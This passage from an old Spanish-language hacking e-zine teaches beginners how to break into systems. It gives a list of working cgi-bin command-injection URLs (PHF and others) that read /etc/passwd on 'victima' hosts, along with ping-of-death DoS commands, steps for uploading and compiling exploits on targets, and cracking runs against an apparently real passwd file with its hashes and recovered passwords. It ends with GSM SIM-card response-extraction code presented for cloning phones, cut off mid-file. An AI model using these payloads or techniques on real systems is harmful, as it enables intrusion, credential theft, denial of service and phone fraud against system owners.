  1916.   * Hacker: En su doble acepcion, persona que posee un nivel muy importante
  1917.             de conocimientos en Unix, experto. Tambien se dice que un hacker
  1918.             es aquel que utiliza sus extensos conocimientos de informatica
  1919.             para "romper" sistemas de seguridad.
  1920.  
  1921.   * HOWTO: Como ir hacia. como conseguir. Documentacion especifica obre algun
  1922.            aspecto concreto de Linux (impresoras, redes, UPS, etc.
  1923.  
  1924.   * Kernel: nucleo. En Linux, parte principal del sistema operativo. Codigo
  1925.             fuente del propio sistema.
  1926.  
  1927.   * LDP: Linux Documentacion Project: Proyecto para la Documentacion de Linux.
  1928.  
  1929.   * LILO: LInux LOader. Cargador de Linux. Pequeño programa que permite el
  1930.           arranque de uno o varios sistemas operativos situados en una misma
  1931.           maquina. LILO puede poner en marcha, OS/2, Linux, MS-DOS,
  1932.           Windows'95, SCO, etc.
  1933.  
  1934.   * LSM: Linux Software Map. "Mapa" de software para Linux. Base de datos que
  1935.          recoge la mayor parte del software disponible para Linux, asi como
  1936.          su autor, descripcion, localizacion, observaciones, etc.
  1937.  
  1938.   * Mainframe: Ordenador principal. Equipo de muy altas prestaciones, Host.
  1939.  
  1940.   * NFS: Network Filey System: Sistemas de ficheros en red.
  1941.  
  1942.   * online on-line: en linea, en conexion. Documentacion on-line: documentos
  1943.                     disponibles a traves de sistemas telematicos.
  1944.  
  1945.   * script: Guion. Shell script: guion para el procesador de 'ordenes.
  1946.             Programa batch. Equivalente en Unix a los ficheros BAT de MS-DOS.
  1947.  
  1948.   * Shell: Interprete de ordenes o comandos. Programa intermediario entre el
  1949.            sistema operativo y el usuario. Imaginatelo como si fuera el
  1950.            sustituto del COMMAND.COM de MS-DOS. Linux soporta varias shells
  1951.            diferentes (bash, ksh, cshell...).
  1952.  
  1953.   * Stdin: entrada standard; usualmente el teclado.
  1954.  
  1955.   * Stdout: salida standard; usualmente la pantalla.
  1956.  
  1957.   * Swap: Intercambio.
  1958.  
  1959.   * swap space: Area de intercambio. Memoria virtual. Zona de almacenamiento
  1960.                 en disco (fichero o particion) que sirve como prolongacion de
  1961.                 la memoria RAM realmente instalada, permitiendo la ejecucion
  1962.                 de procesos que, de otra forma, requeririan una ampliacion
  1963.                 fisica de dicha RAM.
  1964.  
  1965.         IMPORTANTE: Todo el material aqui incluido es de libre copia y
  1966.   distribucion por cualquier medio y soporte siempre que se conserve integro,
  1967.   en caso de reproduccion parcial se debe citar la fuente. La confeccion de
  1968.   esta guia corresponde a LeTaL, es fruto de la experiencia personal y de la
  1969.   recopilacion de documentacion del LDP (Linux Documentation Proyect)
  1970.   traducida por mi o por el Proyectos LuCas (Lunix en Castellano).
  1971.  
  1972.   Agradecimientos: A Linus Torvalds. LuCas, S.L.U.G, J.J.F. / HACKERS TEAM.
  1973.  
  1974. <────────────────────────────────────────────────────────────────────────────>
  1975. ██████████████████████████████████████████████████████████████████████████████
  1976. <────────────────────────────────────────────────────────────────────────────>
  1977.  
  1978.                    /***********************************\
  1979.                     **                               ** 
  1980.                     **    HACK BASICO by \Wend|g0    ** 
  1981.                     **                               **
  1982.                     **          Numero 1             **
  1983.                     **                               **  
  1984.                    \***********************************/
  1985.  
  1986.   TEMAS:
  1987.  
  1988.   - Introduccion
  1989.   - Lista de puertos
  1990.   - Bugs sobre cgi-bin
  1991.   - Como empezar a usar el John the Ripper
  1992.  
  1993. ______________________________________________________________________________
  1994.  
  1995.  
  1996.         Antes de nada k nadie me confunda con el wendigo perteneciente al SHE,
  1997.   ya k yo no soy el. En principio estos textos son para gente que komo yo les
  1998.   gusta este ambiente pero no saben mucho y nadie les ayuda en su aprendizaje.
  1999.   Que quede muy claro que no quiero dar clases a nadie ya que la mayoria sabe
  2000.   mas que yo. Lo que opino es que hay mucha gente empezando que no les vendra
  2001.   mal y se haran una vaga idea de como comenzar. Usea, k si ya sabes algo del
  2002.   tema pierdes el tiempo leyendo esta serie de txts.
  2003.  
  2004.         Lo primero que debes hacer para poder entrar en cualquier sistema es
  2005.   recopilar toda la informacion posible acerca de el.
  2006.  
  2007.   -Version de sistema
  2008.   -Version de sendmail  (Se saca haciendo un telnet al puerto del sendmail
  2009.                          k es el 25)
  2010.   -Version del FTP      (Puerto 21)
  2011.   -Ver si exporta direcorios al exterior   (Desde linux  >Showmount -e host)
  2012.                
  2013.   etc... Asi sabremos k bug ( fallo de sistema ) explotar.
  2014.  
  2015.         Para empezar voy a explicar los puertos. Existen numerosos puertos
  2016.   por los k entrar o interactuar con un host. Para k te kede klaro uno de
  2017.   los puertos k mas has utilizado es el 80, k es el puerto HTTP (hiper text
  2018.   transfer protocol). El FTP tambien tiene el suyo propio, el 21.  Bueno,
  2019.   kizas el k mas uses a partir de ahora sea el 23 (TELNET). Aki va una lista
  2020.   de los puertos mas comunes para utilizar. No son todos pero si algunos de
  2021.   los mas importantes.
  2022.  
  2023.   **********************************************
  2024.  
  2025.   discard                  9
  2026.   netstat                 15
  2027.   chargen                 19  
  2028.   ftp                     21  
  2029.   telnet                  23  
  2030.   smtp  (sendmail)        25  
  2031.   rlp                     39  
  2032.   bootp                   67
  2033.   fingerk                 79  
  2034.   http                    80 / 8080
  2035.   military http           80 / 8080 / 5580  
  2036.   link                    87  
  2037.   pop3                   110
  2038.   identd                 113  
  2039.   nntp                   119  
  2040.   newsk                  144  
  2041.   execk                  512  
  2042.   login                  513  
  2043.   pkill                  515  
  2044.   ktalk                  517  
  2045.   ntalk                  518  
  2046.   netwall                533
  2047.   rmontior               560  
  2048.   montior                561
  2049.   kerberos               750
  2050.  
  2051.   **********************************************
  2052.     
  2053.         Bueno, y despues de esto diras... y ahora que debo hacer? Pues komo
  2054.   no es necesario explicarte, supongo k konoceras el tema del /etc/passwd no?,
  2055.   pues eso, si lo puedes pillar por ftp anonimo hazlo aunke no creo k sea
  2056.   verdadero, es decir, muy gilipoyas tendria k ser el ROOT. Revisa la version
  2057.   de sendmail y busca por tu disco duro algun exploit k funcione, ves a URL∩s
  2058.   komo www.rootshell.com o raregazz.islatortuga.com/utiles.htm y rebusca
  2059.   hasta pillar alguno. Usa cuentas por defecto, haz "surfeo" o cualkier otra
  2060.   cosa. Lo k se te pueda okurrir...
  2061.  
  2062.         Tambien puedes intentar algo muy sencillo k es el PHF. Muchos host no
  2063.   tienen este bug pero te asombrarias de la cantidad de administradores
  2064.   penosos k ahi. Ademas, intentalo siempre, no vaya a ser k funcione XDDD.
  2065.  
  2066.   Abre tu navegador habitual y escribe:
  2067.  
  2068.   http://aki pon el nombre o IP de tu host
  2069.   victima/cgi-bin/phf?Query=x%0acat%20/etc/passwd
  2070.  
  2071.         Con este bug tu puedes usar comandos del UNIX desde tu navegador
  2072.   mismo. increible, no?
  2073.  
  2074.         Pero me diras... Y k komandos puedo usar? Pues de momento aprendete
  2075.   los basicos. Al lado esta la ekivalencia kon los del DOS
  2076.  
  2077.   dir = ls (-a)archivos okultos
  2078.   ver = uname -a (version del sistema)
  2079.   cat = type 
  2080.   cd = cd
  2081.   cls = clear
  2082.  
  2083.         Estos komo minimo debes saberlos YA MISMO. Sigamos kon la tecnica
  2084.   phf. Si te fijas despues de la letra "a" viene el comando cat. Ahi es
  2085.   donde nosotros debemos empezar a poner nuestras ordenes deseadas. Pero...
  2086.   Y los espacios? komo los dejamos? Ajaja amigo ... Los espacios los debes
  2087.   poner komo %20 lo ves mas claro ahora? Ademas puedes usar modificadores
  2088.   pero ten encuenta siempre estos espacios.
  2089.  
  2090.         Bueno, te voy a poner una serie mas de bugs por cgi-bin bastante
  2091.   completita para que vayas jugando un pokillo mas.
  2092.  
  2093. http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  2094. http://www.victima.com/cgi-bin/php.cgi?/etc/passwd
  2095. http://www.victima.com/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
  2096. http://www.victima.com/cgi-bin/phf?Qalias=hell%0auname%20-a%0a
  2097. http://www.victima.com/cgi-bin/handler/whatever;cat /etc/passwd|?data=Download
  2098. http://www.victima.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
  2099. http://www.victima.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
  2100. http://www.victima.com/cgi-bin/view-source?../../../../../../../etc/passwd
  2101. http://www.victima.com/cgi-bin/phf?Jserver=k%0Acat%20/etc/passwd%0a&Qname=d
  2102. http://www.victima.com/cgi-bin/phf?Jserver=k%0Afinger%0a&Qname=d
  2103. http://www.victima.com/cgi-bin/nph-test-cgi?/*
  2104.  
  2105.         Bueno koleguilla... Debes ahora hacerte con un buen crakeador de
  2106.   pass. El que yo te recomiendo es el Ripper. Segun comparativas es el mas
  2107.   rapido que existe. Esta repleto de opciones muy interesantes que debes ir
  2108.   descubriendo por ti mismo. Yo lo uso de dos maneras simples ya k tampoko
  2109.   necesito mas. La primera es usando diccionarios de palabras k te puedes
  2110.   bajar de ftp∩s. La segunda es crakearlo a lo bestia usando todas las
  2111.   posibles combinaciones de palabras. Esto yo lo hago en casos extremos ya
  2112.   k es un proceso inacabable.
  2113.  
  2114.         Comandos que puedes usar con el Ripper:
  2115.  
  2116.   Para usar diccionarios escribe:
  2117.    john -rules -pwfile:<nombre del fichero> -wordfile:<nombre del diccionario>
  2118.   " " modo bestia " john -incremental:all -pwfile:<nombre del fichero>
  2119.   (todo tipo de caracteres)
  2120.   " " modo bestia " john -incremental:digits -pwfile:<nombre del fichero>
  2121.   (solo numeros)
  2122.   " " modo bestia " john -incremental:alpha -pwfile:<nombre del fichero>
  2123.   (solo letras)
  2124.   " " modo bestia " john -incremental:capital -pwfile:<nombre del fichero>
  2125.   (con mayusculas)
  2126.   john -des -incremental -pwfile:<nombre del fichero>
  2127.   john -restore (restaura una sesion despues de haber sido cortada) 
  2128.  
  2129.         Esto es todo por ahora. Si te apetece discutirme o preguntarme algo
  2130.   mi email es wendigo13@hotmail.com
  2131.  
  2132.                 /***********************************\
  2133.                  **                               ** 
  2134.                  **    HACK BASICO by \Wend|g0    ** 
  2135.                  **                               **
  2136.                  **         Numero 2              **
  2137.                  **                               **  
  2138.                 \***********************************/
  2139.  
  2140.   TEMAS:
  2141.  
  2142.   - Comandos de win95
  2143.   - Compilar exploits
  2144.  
  2145. ______________________________________________________________________________
  2146.  
  2147.         Bueno kolega, ya tienes el ficherito famoso, no?. No me apetece
  2148.   explicarte k se divide en tantas partes, k la primera es el login, la
  2149.   segunda el passw...  SUPONGO K YA LO SABES. Sino pillate docs en los k se
  2150.   explica continuamente Y ahora... k hago?. Supongo k habras pillao la
  2151.   version de sistema y de sendmail, no? pues entonces !!! Hazlo !!!
  2152.   k no sabes?????
  2153.  
  2154.         Escribe en el sistema esto: ( en un unix, no en ms-dos XDDDD )
  2155.  
  2156.   # uname -a
  2157.  
  2158.         Sencillo, no? Esto te dara la version del SO donde estas metido de
  2159.   "strangis". Yasta, ahora un exploit k sirva pa este sistema y usalo. Para
  2160.   usarlos debes subirlos al ordenata k intentas atakar. Yo uso el Ws_ftp pero
  2161.   si no tienes ninguno incluso puedes usar el k viene con win95. Viene uno
  2162.   con WIN95 ???? NO JODASSS !!! Pues si. Escribe ftp en alguna ventana
  2163.   ms-dos y se te cambiara el prompt a ftp>
  2164.         Luego escribes open host_a_hackear y listo. Asegurate k el exploit k
  2165.   vas a subir esta en el mismo directorio donde ejecutas el ftp. Aki va una
  2166.   lista de las ordenes del ftp para poder usarlo sin problemas ...
  2167.  
  2168.   !               delete          literal         prompt          send
  2169.   ?               debug           ls              put             status
  2170.   append          dir             mdelete         pwd             trace
  2171.   ascii           disconnect      mdir            quit            type
  2172.   bell            get             mget            quote           user
  2173.   binary          glob            mkdir           recv            verbose
  2174.   bye             hash            mls             remotehelp
  2175.   cd              help            mput            rename
  2176.   close           lcd             open            rmdir
  2177.  
  2178.         No te voy a explicar pa k sirve cada uno ya k hay algunos k ni lo se.
  2179.   Ante todo sinceridad XDDDD. Para salir del ftp> escribe Bye y listo y para
  2180.   subir un exploit u lo k kieras put nombre_del_fichero.
  2181.  
  2182.         Ufff... Esto kansa bastante, en serio. Personalmente prefiero leer k
  2183.   escribir :). Mas programillas k existen el el directorio WinDowS (sistema
  2184.   operativo pseudomultitarea de 16 bits) y k pueden o no ser de utilidad...
  2185.  
  2186.         TRACERT.EXE Va "trazando" todos los hosts desde el tuyo hasta el
  2187.   ekipo al k konectas. Pruebalo, es interesante.
  2188.  
  2189.         PING.EXE Ni k decir tiene pa k sirve. Usado con fines maleficos puede
  2190.   tirar mucha mas pe±a de la k os creeis. Ahi van algunos pings, no se si
  2191.   funcionan todos ya k no los he probao. Me los pasaron el otro dia.
  2192.  
  2193.   ping -l 65510                    Atake de DoS "Denial oF Service"
  2194.   ping -s 1 -f                     Tira equipos IBM
  2195.   ping -s ip-del-lamer 1024        
  2196.  
  2197.             Todos no funcionan en windows... :)
  2198.  
  2199.         NBTSTAT.EXE Jejeje, esta es una de las maneras mas faciles de meterte
  2200.   en el ordenador de alguien, en serio. Ir probando a ver k konseguis y en el
  2201.   proximo numero os explicare como meterte en el ordenata de alguien y
  2202.   dejarlo "acojonao". Funciona kuando alguien tiene alguna carpeta compartida
  2203.   o mejor aun un disko duro. Ahi es donde entraria la "ingenieria social".
  2204.   Escribe nbtstat -A ip_del_lamer y edita el archivo hosts.sam poniendo su IP.
  2205.  
  2206.         ARP.EXE Otra utilidad pa probar XDDD. Sinceramente tengo una vaga
  2207.   idea de para k sirve asin k si alguien kiere explicarmelo gustosamente
  2208.   aceptare.
  2209.  
  2210.         Bueeeeeeno, a lo k ibamos... komo se compila un pu±etero exploit ya
  2211.   dentro del UNIX.victima.es? Debes usar el gcc y el cc. A menudo te pone en
  2212.   los exploits la orden pa compilarlo correctamente. La orden normal a no
  2213.   ser k te digan otra, seria... $ gcc -o exploit exploit.c Asi se te crearia
  2214.   un archivo ejecutable listo pa hacerlo funcionar. Si no funciona ves
  2215.   probando con cc o c++ en vez de gcc. No obstante en algunos sistemas te
  2216.   puedes encontrar con que no "existe" compilador alguno, al menos para el
  2217.   usuario sin privilegios.
  2218.  
  2219. <────────────────────────────────────────────────────────────────────────────>
  2220. ██████████████████████████████████████████████████████████████████████████████
  2221. <────────────────────────────────────────────────────────────────────────────>
  2222.  
  2223.                               - CURSO DE HACK - 
  2224.                                   CHAPTER VI
  2225.  
  2226.         Bueno pues ya estamos en la 6 entrega de este cursillo de hack, en
  2227.   esta entrega he pensado que os explicare el funcionamiento de un crackeador
  2228.   de password, lo mas seguro es que ya sepais hacerlo, para lo que si pues
  2229.   ahora repasais y para los que no, ya es hora de aprender :)
  2230.  
  2231.         Crackeadores de passwords ahi mil, pero por suerte son todos muy
  2232.   parecidos en el uso, ademas que casi todos los s.o. tienen pero como aqui
  2233.   nos enfocamos solo en Unix/Linux los otros los daremos de pasada. No creo
  2234.   necesario incluir una explicacion de la estructura del famoso fichero
  2235.   /etc/passwd, el cual es el que interesa. Existen muchos documentos por
  2236.   Internet que explican el fichero passwd, ademas que en este ezine en otros
  2237.   numeros ya a sido tratado, por lo que recomiendo una pasadita en los
  2238.   numeros anteriores.
  2239.  
  2240.         Ahora nos ponemos en accion, supongamos que ya tenemos el fichero
  2241.   passwd de un servidor cualquiera, hemos copiado el fichero a nuestro HD y
  2242.   ahora usaremos el crackeador que mas nos guste, como ya he dicho existen
  2243.   muchos, en este caso usare varios distintos para que veias la diferencia :)
  2244.  
  2245.         Ejecuto en este caso el John The Ripper, uno de los mas famosos y
  2246.   como vereis estoy usando la version 1.5 la cual es la ultima.
  2247.  
  2248.   D:\hacker\john>john
  2249.  
  2250.   John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer
  2251.  
  2252.   Usage: //D/HACKER/JOHN/john [OPTIONS] [PASSWORD-FILES]
  2253.   -single                   "single crack" mode
  2254.   -wordfile:FILE -stdin     wordlist mode, read words from FILE or stdin
  2255.   -rules                    enable rules for wordlist mode
  2256.   -incremental[:MODE]       incremental mode [using section MODE]
  2257.   -external:MODE            external mode or word filter
  2258.   -restore[:FILE]           restore an interrupted session [from FILE]
  2259.   -session:FILE             set session file name to FILE
  2260.   -makechars:FILE           make a charset, FILE will be overwritten
  2261.   -show                     show cracked passwords
  2262.   -test                     perform a benchmark
  2263.   -users:[-]LOGIN|UID[,..]  load this (these) user(s) only
  2264.   -groups:[-]GID[,..]       load users of this (these) group(s) only
  2265.   -shells:[-]SHELL[,..]     load users with this (these) shell(s) only
  2266.   -salts:[-]COUNT           load salts with at least COUNT passwords only
  2267.   -format:NAME              force ciphertext format NAME (DES, BSDI, MD5, BF)
  2268.   -savemem:LEVEL            enable memory saving, at LEVEL 1..3
  2269.  
  2270.   D:\hacker\john>
  2271.  
  2272.         Como haveis podido notar estoy usando la version MS-DOS,
  2273.   sencillamente es el s.o. en el cual encontraremos mas crackeadores y ademas
  2274.   es la forma que mas gente utiliza, por eso prefiero usar el MS-DOS para este
  2275.   caso pero es igualito que en Unix/Linux.
  2276.  
  2277.         ahora le damos al John un fichero passwd, pero con la opcion single,
  2278.   y el resultado sera el siguiente:
  2279.  
  2280.   D:\hacker\john>john -single echpass
  2281.  
  2282.   John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer
  2283.  
  2284.   Loaded 3 passwords with 3 different salts (Standard DES [24/32 4K])
  2285.   wnnwnn           (wnn)
  2286.   oracle6          (oracle)
  2287.   guesses: 2  time: 0:00:00:00 100%  c/s: 2840  trying: root1958 - r1969
  2288.  
  2289.   D:\hacker\john>
  2290.  
  2291.         Podemos apreciar que el John a encontrado 2 cuentas, decir que el
  2292.   passwd que estoy usando es autentico :) pero posee muy pocas cuenta por lo
  2293.   que creo que es passwd perfecto para este proposito. La cuenta son las
  2294.   siguientes:
  2295.  
  2296.   oracle:vM5OPrBhNOeGY:2000:2000::/opt/oracle:/bin/csh
  2297.   wnn:WtTIftFaGSXTM:2005:2005::/tmp:/bin/csh
  2298.  
  2299.         Esto para el que quiera comprobar la autenticidad de los mismos :)
  2300.   Ahora lo que nos interesa es usar un diccionario con el John ya que asi
  2301.   podra comparar el diccionario con el passwd y obtener las contraseñas de
  2302.   las cuenta que coincidan. Y para ello ejecutamos la sigueinte linea:
  2303.  
  2304.   D:\hacker\john>john -wordfile:password.lst echpass
  2305.  
  2306.   John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer
  2307.  
  2308.   Loaded 1 password (Standard DES [24/32 4K])
  2309.   guesses: 0  time: 0:00:00:00 100%  c/s: 2268  trying: sailor - zhongguo
  2310.  
  2311.   D:\hacker\john>
  2312.  
  2313.         Y como vemos el John en este caso no a encontrado nada, es logico
  2314.   ya que ninguna palabra que se usaban en las contraseñas sale en el
  2315.   diccionario usado, el cual es el propio diccionario que trae el John. Lo
  2316.   aqui presentado es la forma mas basica, por lo que es recomendable que el
  2317.   lector realize sus propios experimentos y obtenga sus conclusiones.
  2318.  
  2319.         Ahora veremos otro famoso crackeador, el cual es conocido como
  2320.   Guess, y lo ejecutamos nos sale lo siguiente:
  2321.  
  2322.   D:\crack>guess
  2323.  
  2324.   GUESS: Unix Password Checker [Version 2.1]
  2325.   GUESS - Copyright 1991 Christian Beaumont
  2326.   C_BEAUMONT@UK.AC.LUT.HICOM and Sysop of fidonet node 2:250/301
  2327.   THIS IS A BETA TEST VERSION FOR PUBLIC DISTRIBUTION
  2328.   Use: GUESS [PASSWORD_FILE] [[OPTION] [DICTIONARY]] ...
  2329.   Options are:
  2330.  
  2331.         -a       Perform algorithmic check of password file
  2332.         -cWORD   Catch up to specified word in dictionary
  2333.         -sWORD   Check password file against specifed word only
  2334.         -uNAME   Limit checking of dictionary to a certain user name
  2335.         -w       Permit checking of dictionary to all users
  2336.  
  2337.   If you find GUESS useful or have any comments please feel free
  2338.   to contact me.
  2339.  
  2340.   Christian Beaumont +44-81-883-5683 (home) +44-81-680-1066 (work)
  2341.  
  2342.   D:\crack>
  2343.  
  2344.         Como vemos nos sale las diferentes opciones que lleva el programa,
  2345.   ahora ejecutaremos el Guess con el fichero de contraseñas de la siguiente
  2346.   manera:
  2347.  
  2348.   D:\crack>guess echpass -a
  2349.   Reading password file ...
  2350.   ENTRIES  19
  2351.   BROKEN   0
  2352.   UNBROKEN 3
  2353.   PERCENT BROKEN  0
  2354.   Initialising tables
  2355.   Performing algorithmic check
  2356.   wnn is wnnwnn
  2357.   6 guesses in 0 seconds (109 guesses/sec 1 clocks)
  2358.  
  2359.   D:\crack>
  2360.  
  2361.         Como podemos apreciar solo a encontrado una cuenta, la cual es "wnn",
  2362.   aqui vemos una diferencia entre el Guess y el John. Como siempre lo mejor
  2363.   es usar un diccionario, pero si fuese el caso que consegueis un fichero
  2364.   passwd de un pais extranjero, lo logico es que useis un diccionario en
  2365.   ese idioma, ya que asi conseguireis averiguar mas cuentas. Un buen sitio
  2366.   para pillar diccionarios es el siguiente url:
  2367.  
  2368.   http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html
  2369.  
  2370.         Para que luego digan que no aprovechamos los recursos de la NCSA :)
  2371.   Y ahora un pongo una lista con los diferentes crackeadores que os podreis
  2372.   encontrar en Internet o en nuestra seccion de CRACK.
  2373.  
  2374.   Nombre                      Plataforma
  2375.   ------                      ----------
  2376.  
  2377.   # Crack                     Unix\Dos
  2378.  
  2379.   # CrackerJack               Unix\Dos\Os/2
  2380.  
  2381.   # PaceCrack95               Windows
  2382.  
  2383.   # Qcrack                    Dos\Windows
  2384.  
  2385.   # John the Ripper           Unix\Dos\Windows
  2386.  
  2387.   # Pcrack                    Unix
  2388.  
  2389.   # Hades                     Dos
  2390.  
  2391.   # Star Cracker              Dos
  2392.  
  2393.   # Killer Cracker            Unix
  2394.  
  2395.   # Hellfire Cracker          Dos
  2396.  
  2397.   # Xit                       Dos
  2398.  
  2399.   # Claymore                  Windows
  2400.                            
  2401.   # Guess                     Dos
  2402.  
  2403.   # PC Unix Password Cracker  Dos
  2404.  
  2405.   # Merlin                    Unix
  2406.   
  2407.         Por si no queda lo suficientemente claro todos estos crackeadores
  2408.   solo sirven para los ficheros /etc/passwd de Unix, la plataforma, es en el
  2409.   sistema operativo la cual corren estos programas.
  2410.  
  2411.         Para conseguir una gran variedad de crackeadores lo mejor es pasar
  2412.   por nuestra seccion de CRACK, en la cual podras bajarte muchos, incluido
  2413.   el John. En caso que algo no haya quedado claro, pues en envias un mail
  2414.   y lo solucionare en el proximo numero :)
  2415.  
  2416.   Byes all y hasta la vista !!
  2417.     
  2418.                                                         CONDE VAMPIRO
  2419.                                                   - J.J.F. / HACKERS TEAM -
  2420.  
  2421. <────────────────────────────────────────────────────────────────────────────>
  2422. ██████████████████████████████████████████████████████████████████████████████
  2423. <────────────────────────────────────────────────────────────────────────────>
  2424.  
  2425.                        \-------------------------------/
  2426.                          \  CLONANDO MOVILES DEL CCC /
  2427.                            \-----------------------/
  2428.  
  2429.         NOTA DE - J.J.F. / HACKERS TEAM - : Todo este codigo fuente fue
  2430.   obtenido en el website del CCC (Chaos Computer Club). Un conocido grupo de
  2431.   hackers alemanes. Por lo que no nos hacemos responsables del mal uso del
  2432.   material aqui expuesto. Este codigo es para sistemas operativos Linux.
  2433.  
  2434.   http://www.ccc.de
  2435.  
  2436.   File : getresponse.cc
  2437.  
  2438. ------------ Codigo Fuente ---------------------------------------------------
  2439.  
  2440. #include "getresponse.h"
  2441. #include <stdio.h>
  2442. #include <string.h>
  2443. #include <stdlib.h>
  2444. #include <ctype.h>
  2445.  
  2446. #define private private_hack
  2447. extern "C" {
  2448. #include <sio.h>
  2449. #include <sct0.h>
  2450. #include <sc.h>
  2451. }
  2452. #undef private
  2453.  
  2454. int timeout;
  2455.  
  2456. SIO_INFO* si;
  2457. Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 };
  2458. Byte gsm_file[] = { 0x7f, 0x20 };
  2459. Byte gsm2_file[] = { 0x7f, 0x21 };
  2460. Byte get_res[] = { 0xa0, 0xc0, 0x00,  0x00, 0x00 };
  2461. Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 };
  2462. Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 };
  2463.  
  2464. void init_card(char* devicename, Byte pin[8]) {
  2465.   Byte buffer[32];
  2466.   int i;
  2467.   SC_ATR * atr;
  2468.   SC_STATE *sc;
  2469.   SLOG *log;
  2470.  
  2471.   si = SIO_Open(devicename);
  2472.   if (si!=NULL) {
  2473.     /* setup for 9600, 8 data, 2 stop, even parity */
  2474.     SIO_SetSpeed(si,9600);
  2475.     SIO_SetDataBits(si,8);
  2476.     SIO_SetStopBits(si,2);
  2477.     SIO_SetParity(si,SIO_PARITY_ODD);
  2478.     SIO_SetIOMode(si,SIO_IOMODE_INDIRECT);
  2479.     SIO_FilterEcho(si, 1);
  2480.  
  2481.     /* now actually change the line settings */
  2482.     SIO_WriteSettings(si);
  2483.  
  2484.     /* trigger ATR from a Smartcard */
  2485.     if(i = SCT0_GetATR(si, buffer, 32)) {
  2486.       atr=SC_DecodeATR(buffer, i);
  2487.       printf("ATR: %s\n", SC_ATR2Text(atr, 0));
  2488.       
  2489.       SIO_Delay(si,10000);
  2490.       SIO_WriteBuffer(si, selectfile, 5);
  2491.       SIO_WaitForData(si, 1000);
  2492.       SIO_ReadBuffer(si, buffer, 32);
  2493.  
  2494.       SIO_WriteBuffer(si, gsm_file, 2);
  2495.       SIO_WaitForData(si, 1000);
  2496.       SIO_ReadBuffer(si, buffer, 32);
  2497.  
  2498.       if(buffer[0] != 0x9f) {
  2499.     printf("selecting gsm_file failed, trying DCS1800!\n");
  2500.  
  2501.     SIO_WriteBuffer(si, selectfile, 5);
  2502.     SIO_WaitForData(si, 1000);
  2503.     SIO_ReadBuffer(si, buffer, 32);
  2504.  
  2505.     SIO_WriteBuffer(si, gsm2_file, 2);
  2506.     SIO_WaitForData(si, 1000);
  2507.     SIO_ReadBuffer(si, buffer, 32);
  2508.  
  2509.     if(buffer[0] != 0x9f) {
  2510.       printf("selecting gsm_file failed!\n");
  2511.       exit(1);
  2512.     }
  2513.       }
  2514.       get_res[4] = buffer[1];
  2515.       memcpy(buffer, get_res, 5);
  2516.       SIO_WriteBuffer(si, buffer, 5);
  2517.       SIO_WaitForData(si, 1000);
  2518.       i = SIO_ReadBuffer(si, buffer, 32);
  2519.  
  2520.       SIO_WriteBuffer(si, verify_pin, 5);
  2521.       SIO_WaitForData(si, 1000);
  2522.       i = SIO_ReadBuffer(si, buffer, 32);
  2523.  
  2524.       SIO_WriteBuffer(si, pin, 8);
  2525.       SIO_Delay(si,100000);
  2526.       SIO_WaitForData(si, 1000);
  2527.       i = SIO_ReadBuffer(si, buffer, 32);
  2528.  
  2529.       if(buffer[0] != 0x90) {
  2530.     printf("PIN verification failed!\n");
  2531.     for(int j=0; j<i; j++) {
  2532.       printf("0x%02X ", buffer[j]);
  2533.     }
  2534.     printf("\n");
  2535.     exit(1);
  2536.       }
  2537.  
  2538.     } else {
  2539.       printf("Sorry, connection to your smart card failed.\n");
  2540.       exit(1);
  2541.     }
  2542.   } else {
  2543.     printf("Sorry, opening the device %s failed.\n", devicename);
  2544.     exit(1);
  2545.   }
  2546. }
  2547.  
  2548. void get_response(Byte challenge[16], Byte response[12]) {
  2549.   Byte buffer[32];
  2550.   int i;
  2551.  
  2552.   memcpy(buffer, generate_sres, 5);
  2553.   SIO_WriteBuffer(si, buffer, 5);
  2554.   do {
  2555.     SIO_WaitForData(si, 1000);
  2556.     i = SIO_ReadBuffer(si, buffer, 32);
  2557.   } while (i==0);
  2558.  
  2559.  
  2560.   memcpy(buffer, challenge, 16);
  2561.   SIO_WriteBuffer(si, buffer, 16);
  2562.   SIO_Delay(si, timeout);
  2563.   do {
  2564.     SIO_WaitForData(si, 1000);
  2565.     i = SIO_ReadBuffer(si, buffer, 32);
  2566.   } while (i==0);
  2567.  
  2568.   if(buffer[0] != 0x9f) {
  2569.     printf("getting response failed!\n");
  2570.     exit(1);
  2571.   }
  2572.  
  2573.   get_res[4] = buffer[1];
  2574.   memcpy(buffer, get_res, 5);
  2575.   SIO_WriteBuffer(si, buffer, 5);
  2576.   SIO_WaitForData(si, 1000);
  2577.   i = SIO_ReadBuffer(si, buffer, 32);
  2578.  
  2579.   memcpy(response, buffer + 1, 12);
  2580. }
  2581.  
  2582. void set_timeout(int t) {
  2583.   timeout = t;
  2584. }
  2585.  
  2586. #ifdef 0
  2587. int main(int argc, char** argv) {
  2588.   Byte challenge[16] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  2589.              0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  2590.   Byte pin[8] = { 0x35, 0x35, 0x35, 0x35, 0xff, 0xff, 0xff, 0xff };
  2591.  
  2592.   Byte response[12];
  2593.  
  2594.   init_card("/dev/ttyS1", pin);
  2595.   get_response(challenge, response);
  2596. }
  2597. #endif
  2598.  
  2599. ------------ FIN -------------------------------------------------------------
  2600.  
  2601.   File : getresponse.h
  2602.  
  2603. ------------ Codigo Fuente ---------------------------------------------------
  2604.  
  2605. #ifndef _GETRESPONSE_H
  2606. #define _GETRESPONSE_H
  2607.  
  2608. typedef unsigned char Byte;
  2609.  
  2610. extern void init_card(char* devicename, Byte pin[8]);
  2611. extern void get_response(Byte challenge[16], Byte response[12]);
  2612. extern void set_timeout(int);
  2613.  
  2614. #endif
  2615.  
  2616. ------------ FIN -------------------------------------------------------------
  2617.  
  2618.   File : README.GSM
  2619.  
  2620. ------------ Codigo Fuente ---------------------------------------------------
  2621.  
  2622. Hi!
  2623.  
  2624. You should have extracted this archive into the same directory as
  2625. sio. You can get the latest version of sio at ftp://ftp.cryptsoft/com/scard,
